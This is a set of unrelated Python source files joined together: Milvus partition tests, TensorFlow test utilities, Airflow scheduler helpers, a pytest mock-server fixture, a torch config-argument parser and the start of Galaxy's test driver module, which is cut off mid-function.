@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_partition_after_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.drop_partition(collection, default_tag)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_release_after_collection_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_partitions(collection, [default_tag])
connect.drop_collection(collection)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection
try:
connect.release_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection
class TestLoadPartitionInvalid(object):
"""
    Test load partition with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_partition_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_load_partition_with_invalid_partition_name(self, connect, collection, get_partition_name):
partition_name = get_partition_name
with pytest.raises(Exception) as e:
connect.load_partitions(collection, [partition_name])
@pytest.mark.level(2)
def test_release_partition_with_invalid_partition_name(self, connect, collection, get_partition_name):
partition_name = get_partition_name
with pytest.raises(Exception) as e:
            connect.release_partitions(collection, [partition_name])
|
test_util.py | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import math
import re
import sys
import threading
import numpy as np
import six
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import session
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import versions
from tensorflow.python.platform import googletest
from tensorflow.python.platform import logging
from tensorflow.python.util import compat
from tensorflow.python.util.protobuf import compare
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError(
"Expected op for node %s is different. %s vs %s" % (
node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError(
"Not all expected ops are present. Expected %s, found %s" % (
expected_ops.keys(), actual_ops.keys()))
return actual_ops
def assert_equal_graph_def(actual, expected):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"):
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
ops.reset_default_graph()
def tearDown(self):
for thread in self._threads:
self.assertFalse(thread.is_alive(), "A checkedThread did not terminate")
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
if not self._tempdir:
self._tempdir = googletest.GetTempDir()
return self._tempdir
def _AssertProtoEquals(self, a, b):
"""Asserts that a and b are the same proto.
    Uses ProtoEq() first, as it returns correct results
    for floating point attributes, and then uses assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True)
def assertProtoEquals(self, expected_message_maybe_ascii, message):
"""Asserts that message is same as parsed expected_message_ascii.
    Creates another proto of the same type as message, reads the ascii
    message into it and then compares them using self._AssertProtoEquals().
Args:
expected_message_maybe_ascii: proto message in original or ascii form
message: the message to validate
"""
if type(expected_message_maybe_ascii) == type(message):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(expected_message_maybe_ascii, expected_message)
self._AssertProtoEquals(expected_message, message)
else:
      assert False, ("Can't compare protos of type %s and %s" %
                     (type(expected_message_maybe_ascii), type(message)))
def assertProtoEqualsVersion(
self, expected, actual, producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/gpu:0`. Otherwise, if `use_gpu`
is True, TensorFlow tries to run as many ops on the GPU as possible. If both
    `force_gpu` and `use_gpu` are False, all ops are pinned to the CPU.
Example:
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
          self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/gpu:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
config = config_pb2.ConfigProto().CopyFrom(config)
config.allow_soft_placement = False
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(graph=None,
config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
with sess.graph.device("/gpu:0"):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
with sess.graph.device("/gpu:0"):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
# pylint: disable=broad-except
except Exception as e:
# pylint: enable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
        self._testcase.failureException: If the thread terminates due to
          an exception.
"""
self._thread.join()
if self._exception is not None:
self._testcase.fail(
"Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: a float value.
f2: a float value.
err: a float value.
"""
self.assertTrue(math.fabs(f1 - f2) < err)
def assertArrayNear(self, farray1, farray2, err):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
"""
for f1, f2 in zip(farray1, farray2):
self.assertNear(f1, f2, err)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err))
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6):
"""Asserts that two numpy arrays have near values.
Args:
      a: a numpy ndarray or anything that can be converted to one.
      b: a numpy ndarray or anything that can be converted to one.
rtol: relative tolerance
atol: absolute tolerance
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(
a.shape, b.shape,
"Shape mismatch: expected %s, got %s." % (a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
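      # Worked example (illustrative): with rtol = atol = 1e-6, a = 1.00001
      # and b = 1.0 give |a - b| = 1e-5, which exceeds atol + rtol*|b| = 2e-6,
      # so that element is reported below.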
cond = np.abs(a - b) > atol + rtol * np.abs(b)
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
np.testing.assert_allclose(a, b, rtol=rtol, atol=atol)
def assertAllEqual(self, a, b):
"""Asserts that two numpy arrays have the same values.
Args:
      a: a numpy ndarray or anything that can be converted to one.
      b: a numpy ndarray or anything that can be converted to one.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(
a.shape, b.shape,
"Shape mismatch: expected %s, got %s." % (a.shape, b.shape))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in OpError exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
errors.OpError exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message
op = e.op
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
# pylint: disable=broad-except
except Exception as e:
# pylint: enable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError(e)
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(np_array.shape, tf_tensor.get_shape().as_list())
def assertDeviceEqual(self, device1, device2):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `Device` object.
device2: A string device name or TensorFlow `Device` object.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2,
"Devices %s and %s are not equal" % (device1, device2))
# Fix Python 3 compatibility issues
if six.PY3:
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
|
main.py | import asyncio
import sys
import threading
from monkey_patched.game import Game
# Init components
game = Game()
def start_server(loop):
from backend.server import main
threading.Thread(target=main, args=(loop,)).start()
def test_server(loop, rand_sleep=True):
from api_tester import ApiTester
threading.Thread(target=ApiTester(loop, rand_sleep=rand_sleep).start_test).start()
def run_ui():
from board_drawing import BDManager
BDManager()
if __name__ == '__main__':
_loop = asyncio.get_event_loop()
start_server(_loop)
    if len(sys.argv) > 1 and sys.argv[1] == 'test':
test_server(_loop, rand_sleep=False)
run_ui()
|
airflow_scheduler_utils.py | # Copyright 2022 The AI Flow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import signal
import threading
import time
import os
import logging
import multiprocessing as mp
from subprocess import Popen
from ai_flow.plugin_interface.scheduler_interface import WorkflowExecutionInfo
from airflow.contrib.jobs.event_based_scheduler_job import EventBasedSchedulerJob
from airflow.events.scheduler_events import StopSchedulerEvent
from airflow.executors.local_executor import LocalExecutor
from typing import Callable
from notification_service.client import NotificationClient
def start_scheduler(file_path, port=50052, executor=None):
if executor is None:
executor = LocalExecutor(15)
scheduler = EventBasedSchedulerJob(
dag_directory=file_path,
notification_server_uri="localhost:{}".format(port),
executor=executor,
max_runs=-1,
refresh_dag_dir_interval=30
)
print("scheduler starting")
scheduler.run()
def start_airflow_scheduler_server(file_path, port=50052) -> mp.Process:
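    # NOTE (assumption about usage): mp.set_start_method() raises a
    # RuntimeError if called more than once per process; pass force=True
    # below if this helper may be invoked repeatedly.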
mp.set_start_method('spawn')
process = mp.Process(target=start_scheduler, args=(file_path, port))
process.start()
return process
def start_airflow_web_server() -> Popen:
def pre_exec():
# Restore default signal disposition and invoke setsid
for sig in ('SIGPIPE', 'SIGXFZ', 'SIGXFSZ'):
if hasattr(signal, sig):
signal.signal(getattr(signal, sig), signal.SIG_DFL)
os.setsid()
env = os.environ.copy()
stdout_log = './web.log'
with open(stdout_log, 'w') as out:
sub_process = Popen( # pylint: disable=subprocess-popen-preexec-fn
'airflow webserver -p 8080',
stdout=out,
stderr=out,
env=env,
shell=True,
preexec_fn=pre_exec,
)
logging.info('Process pid: %s', sub_process.pid)
return sub_process
def run_ai_flow_workflow(dag_id, test_function: Callable[[NotificationClient], None], port=50052, executor=None):
def run_test_fun():
time.sleep(5)
client = NotificationClient(server_uri="localhost:{}".format(port),
default_namespace="test")
try:
test_function(client)
except Exception as e:
raise e
finally:
client.send_event(StopSchedulerEvent(job_id=0).to_event())
t = threading.Thread(target=run_test_fun, args=())
    t.daemon = True
t.start()
dag_file = '/tmp/airflow/' + dag_id + '.py'
start_scheduler(file_path=dag_file, port=port, executor=executor)
def get_dag_id(namespace, workflow_name):
return '{}.{}'.format(namespace, workflow_name)
class WorkflowExecutionWrapper(object):
def __init__(self):
self.workflow_execution_info: WorkflowExecutionInfo = None
workflow_wrapper = WorkflowExecutionWrapper()
def set_workflow_execution_info(workflow_execution_info: WorkflowExecutionInfo):
global workflow_wrapper
workflow_wrapper.workflow_execution_info = workflow_execution_info
def get_workflow_execution_info() -> WorkflowExecutionInfo:
global workflow_wrapper
return workflow_wrapper.workflow_execution_info
|
conftest.py | from pytest import fixture
@fixture
def http_port():
return 8080
@fixture
def mock_app(tmpdir):
def _mock_app(environ, start_response):
""" self verify mock app """
import wsgiref
import json
request_uri = wsgiref.util.request_uri(environ)
assert environ['REQUEST_METHOD'].upper() == 'POST'
post_env = environ.copy()
post_data = json.loads(
post_env['wsgi.input'].read(int(post_env['CONTENT_LENGTH'])))
assert post_data['foo']
# return fake response
start_response('200 OK', [('Content-Type', 'application/json')])
return [
bytes(json.dumps(dict(
status='yeah!',
foo=post_data['foo'],
request_uri=request_uri)), 'utf-8')
]
return _mock_app
@fixture(autouse=True)
def mock_callback(tmpdir, mock_app, http_port):
""" mock callback handler """
from wsgiref.simple_server import make_server
import multiprocessing
    server = make_server('', http_port, mock_app)
server_process = multiprocessing.Process(target=server.serve_forever)
server_process.start()
yield
server_process.terminate()
server_process.join()
    del server_process
|
arg.py | import sys
import configparser
import torch
import threading
import time
import os
__author__ = 'namju.kim@kakaobrain.com'
_config_time_stamp = 0
class _Opt(object):
def __len__(self):
return len(self.__dict__)
def __setitem__(self, key, value):
self.__dict__[key] = value
def __getitem__(self, item):
if item in self.__dict__:
return self.__dict__[item]
else:
return None
def __getattr__(self, item):
return self.__getitem__(item)
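# Illustrative sketch (not part of the original module): _Opt is a permissive
# attribute bag where unknown keys resolve to None instead of raising, which is what
# allows the defaulting further below (e.g. `arg.log_dir or 'asset/log/'`).
# The helper is hypothetical and never called.
def _example_opt_usage():
    opt = _Opt()
    opt['lr'] = 0.001
    assert opt.lr == 0.001       # item and attribute access are interchangeable
    assert opt.missing is None   # unknown keys quietly return None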
def _to_py_obj(x):
# check boolean first
if x.lower() in ['true', 'yes', 'on']:
return True
if x.lower() in ['false', 'no', 'off']:
return False
# from string to python object if possible
try:
obj = eval(x)
if type(obj).__name__ in ['int', 'float', 'tuple', 'list', 'dict', 'NoneType']:
x = obj
except:
pass
return x
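# Illustrative sketch (not part of the original module): how _to_py_obj coerces the
# string values read from the command line or an INI file. The sample values are
# hypothetical and the helper is never called.
def _example_to_py_obj_usage():
    assert _to_py_obj('yes') is True         # 'true'/'yes'/'on' become booleans
    assert _to_py_obj('off') is False        # 'false'/'no'/'off' likewise
    assert _to_py_obj('3.14') == 3.14        # numeric literals are evaluated
    assert _to_py_obj('[1, 2]') == [1, 2]    # so are list/tuple/dict literals
    assert _to_py_obj('hello') == 'hello'    # anything else stays a string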
def _parse_config(arg, file):
# read config file
config = configparser.ConfigParser()
config.read(file)
# traverse sections
for section in config.sections():
# traverse items
opt = _Opt()
for key in config[section]:
opt[key] = _to_py_obj(config[section][key])
# if default section, save items to global scope
if section.lower() == 'default':
for k, v in opt.__dict__.items():
arg[k] = v
else:
arg['_'.join(section.split())] = opt
def _parse_config_thread(arg, file):
global _config_time_stamp
while True:
# check timestamp
stamp = os.stat(file).st_mtime
if not stamp == _config_time_stamp:
# update timestamp
_config_time_stamp = stamp
# parse config file
_parse_config(arg, file)
# print result
# _print_opts(arg, 'CONFIGURATION CHANGE DETECTED')
# sleep
time.sleep(1)
def _print_opts(arg, header):
print(header, flush=True)
print('-' * 30, flush=True)
for k, v in arg.__dict__.items():
print('%s=%s' % (k, v), flush=True)
print('-' * 30, flush=True)
def _parse_opts():
global _config_time_stamp
# get command line arguments
arg = _Opt()
argv = sys.argv[1:]
# check length
assert len(argv) % 2 == 0, 'arguments should be paired with the format of --key value'
# parse args
for i in range(0, len(argv), 2):
# check format
assert argv[i].startswith('--'), 'arguments should be paired with the format of --key value'
# save argument
arg[argv[i][2:]] = _to_py_obj(argv[i + 1])
# check config file
if argv[i][2:].lower() == 'config':
_parse_config(arg, argv[i + 1])
_config_time_stamp = os.stat(argv[i + 1]).st_mtime
#
# inject default options
#
# device setting
if arg.device is None:
arg.device = 'cuda' if torch.cuda.is_available() else 'cpu'
arg.device = torch.device(arg.device)
arg.cuda = arg.device.type == 'cuda'
# default learning rate
#arg.lr = 1e-3
# directories
arg.log_dir = arg.log_dir or 'asset/log/'
arg.data_dir = arg.data_dir or 'asset/data/'
arg.save_dir = arg.save_dir or 'asset/train/'
arg.log_dir += '' if arg.log_dir.endswith('/') else '/'
arg.data_dir += '' if arg.data_dir.endswith('/') else '/'
arg.save_dir += '' if arg.save_dir.endswith('/') else '/'
# print arg option
# _print_opts(arg, 'CONFIGURATION')
# start config file watcher if config is defined
if arg.config:
t = threading.Thread(target=_parse_config_thread, args=(arg, arg.config))
t.daemon = True
t.start()
return arg
|
driver_util.py | """Scripts for drivers of Galaxy functional tests."""
import fcntl
import logging
import os
import random
import re
import shutil
import signal
import socket
import string
import struct
import subprocess
import sys
import tempfile
import threading
import time
import nose.config
import nose.core
import nose.loader
import nose.plugins.manager
import yaml
from paste import httpserver
from six.moves import (
http_client,
shlex_quote
)
from six.moves.urllib.parse import urlparse
from sqlalchemy_utils import (
create_database,
database_exists,
)
from galaxy.app import UniverseApplication as GalaxyUniverseApplication
from galaxy.config import LOGGING_CONFIG_DEFAULT
from galaxy.model import mapping
from galaxy.model.tool_shed_install import mapping as toolshed_mapping
from galaxy.tool_util.verify.interactor import GalaxyInteractorApi, verify_tool
from galaxy.util import asbool, download_to_file, galaxy_directory
from galaxy.util.properties import load_app_properties
from galaxy.web import buildapp
from galaxy_test.base.api_util import get_master_api_key, get_user_api_key
from galaxy_test.base.instrument import StructuredTestDataPlugin
from galaxy_test.base.nose_util import run
from tool_shed.webapp.app import UniverseApplication as ToolshedUniverseApplication
from .test_logging import logging_config_file
galaxy_root = galaxy_directory()
DEFAULT_WEB_HOST = socket.gethostbyname('localhost')
DEFAULT_CONFIG_PREFIX = "GALAXY"
GALAXY_TEST_DIRECTORY = os.path.join(galaxy_root, "test")
GALAXY_TEST_FILE_DIR = "test-data,https://github.com/galaxyproject/galaxy-test-data.git"
TOOL_SHED_TEST_DATA = os.path.join(galaxy_root, "lib", "tool_shed", "test", "test_data")
TEST_WEBHOOKS_DIR = os.path.join(galaxy_root, "test", "functional", "webhooks")
FRAMEWORK_TOOLS_DIR = os.path.join(GALAXY_TEST_DIRECTORY, "functional", "tools")
FRAMEWORK_UPLOAD_TOOL_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "upload_tool_conf.xml")
FRAMEWORK_SAMPLE_TOOLS_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "samples_tool_conf.xml")
FRAMEWORK_DATATYPES_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "sample_datatypes_conf.xml")
MIGRATED_TOOL_PANEL_CONFIG = 'config/migrated_tools_conf.xml'
INSTALLED_TOOL_PANEL_CONFIGS = [
os.environ.get('GALAXY_TEST_SHED_TOOL_CONF', 'config/shed_tool_conf.xml')
]
REALTIME_PROXY_TEMPLATE = string.Template(r"""
uwsgi:
http-raw-body: true
interactivetools_map: $tempdir/interactivetools_map.sqlite
python-raw: scripts/interactivetools/key_type_token_mapping.py
route-host: ^([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)-([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.(interactivetool\.$test_host:$test_port)$ goto:interactivetool
route-run: goto:endendend
route-label: interactivetool
route-host: ^([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)-([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.(interactivetool\.$test_host:$test_port)$ rpcvar:TARGET_HOST rtt_key_type_token_mapper_cached $1 $3 $2 $4 $0 5
route-if-not: empty:${TARGET_HOST} httpdumb:${TARGET_HOST}
route: .* break:404 Not Found
route-label: endendend
""")
DEFAULT_LOCALES = "en"
log = logging.getLogger("test_driver")
# Global variables to pass database contexts around - only needed for older
# Tool Shed twill tests that didn't utilize the API for such interactions.
galaxy_context = None
tool_shed_context = None
install_context = None
def setup_tool_shed_tmp_dir():
tool_shed_test_tmp_dir = os.environ.get('TOOL_SHED_TEST_TMP_DIR', None)
if tool_shed_test_tmp_dir is None:
tool_shed_test_tmp_dir = os.path.realpath(tempfile.mkdtemp())
# Here's the directory where everything happens. Temporary directories are created within this directory to contain
# the hgweb.config file, the database, new repositories, etc. Since the tool shed browses repository contents via HTTP,
    # the full path to the temporary directory where the repositories are located cannot contain invalid URL characters.
os.environ['TOOL_SHED_TEST_TMP_DIR'] = tool_shed_test_tmp_dir
return tool_shed_test_tmp_dir
def get_galaxy_test_tmp_dir():
"""Create test directory for use by Galaxy server being setup for testing."""
galaxy_test_tmp_dir = os.environ.get('GALAXY_TEST_TMP_DIR', None)
if galaxy_test_tmp_dir is None:
galaxy_test_tmp_dir = tempfile.mkdtemp()
return galaxy_test_tmp_dir
def configure_environment():
"""Hack up environment for test cases."""
# no op remove if unused
if 'HTTP_ACCEPT_LANGUAGE' not in os.environ:
os.environ['HTTP_ACCEPT_LANGUAGE'] = DEFAULT_LOCALES
# Used by get_filename in tool shed's twilltestcase.
if "TOOL_SHED_TEST_FILE_DIR" not in os.environ:
os.environ["TOOL_SHED_TEST_FILE_DIR"] = TOOL_SHED_TEST_DATA
os.environ["GALAXY_TEST_ENVIRONMENT_CONFIGURED"] = "1"
def build_logger():
"""Build a logger for test driver script."""
return log
def ensure_test_file_dir_set():
"""Ensure GALAXY_TEST_FILE_DIR setup in environment for test data resolver.
Return first directory for backward compat.
"""
galaxy_test_file_dir = os.environ.get('GALAXY_TEST_FILE_DIR', GALAXY_TEST_FILE_DIR)
os.environ['GALAXY_TEST_FILE_DIR'] = galaxy_test_file_dir
first_test_file_dir = galaxy_test_file_dir.split(",")[0]
return first_test_file_dir
def setup_galaxy_config(
tmpdir,
use_test_file_dir=False,
default_install_db_merged=True,
default_tool_data_table_config_path=None,
default_shed_tool_data_table_config=None,
default_job_config_file=None,
enable_tool_shed_check=False,
default_tool_conf=None,
shed_tool_conf=None,
datatypes_conf=None,
update_integrated_tool_panel=False,
prefer_template_database=False,
log_format=None,
conda_auto_init=False,
conda_auto_install=False,
use_shared_connection_for_amqp=False,
):
"""Setup environment and build config for test Galaxy instance."""
# For certain docker operations this needs to be evaluated out - e.g. for cwltool.
tmpdir = os.path.realpath(tmpdir)
if not os.path.exists(tmpdir):
os.makedirs(tmpdir)
